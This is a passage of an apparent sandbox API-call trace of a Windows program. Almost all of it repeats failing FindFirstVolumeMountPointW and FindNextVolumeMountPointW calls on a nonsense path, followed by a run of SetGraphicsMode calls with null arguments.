zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.580] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.580] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.581] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.581] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.582] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.582] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.583] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.583] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.583] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.583] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.583] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.583] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.622] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.622] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.622] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.622] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.622] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.622] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.622] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.622] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.622] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.622] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 